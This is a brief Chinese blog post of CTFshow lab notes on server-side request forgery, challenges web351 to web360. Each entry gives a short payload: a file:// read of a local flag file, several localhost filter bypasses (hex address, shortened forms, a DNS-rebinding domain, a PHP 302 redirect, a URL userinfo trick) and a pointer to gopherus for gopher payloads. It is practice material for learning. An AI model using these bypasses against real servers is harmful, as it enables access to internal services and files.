CTFshow之SSRF

本文详细介绍了多种Web服务器端请求伪造(SSRF)的利用方法,包括不同URL格式的构造,如十六进制表示、DNS重绑定、HTTP头部利用等,并提到了一些常见挑战的解决方案,如代码检测IP范围的绕过。同时,推荐了两个CTF学习资源,帮助读者深入理解SSRF漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

其他师傅都写得很详细了,只是做个简单的笔记。

1 web351

POST

url=file:///var/www/html/flag.php

2 web352

只限制了协议。

url=http://127.0.0.1/flag.php 

3 web353

十六进制表示:

url=http://0x7F000007/flag.php

在线转换工具:https://tool.520101.com/wangluo/jinzhizhuanhuan/

4 web354

image-20210904192214123

不知道为什么服务器没有成功。A记录是127.0.0.1的网站: http://sudo.cc/,可以不用解析自己的。本来想使用 DNS 重绑定平台,但是我常用的那个平台现在不能用了。emm

url=http://sudo.cc/flag.php
  • (方便绑定IP)DNS重绑定平台:http://ceye.io/

5 web355

在 CTF从0到1 中有介绍这种利用方式

http://127.1/flag.php

6 web356

  • 127.0.0.1 的特殊写法
http://0/flag.php

7 web357

代码中检测了IP的范围,所以需要使用302或者DNS重绑定。

<?php
header("Location:http://127.0.0.1/flag.php"); 

8 web358

正则表达式的意思是以http://ctf.开头,以show结尾。

http://ctf.@127.0.0.1/flag.php?show

URL的结构如下:

img

9 web359

  • 使用 gopherus 生成 Payload
  • 把下划线后面的内容url编码一次
  • post:reurl=xxx

10 web360

方法同 web359

参考教程:

  • ctfshow-web入门 ssrf篇_volcano的博客-优快云博客:https://blog.youkuaiyun.com/weixin_45696568/article/details/114434596
  • CTFSHOW SSRF篇_羽的博客-优快云博客:https://blog.youkuaiyun.com/miuzzx/article/details/111992415
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值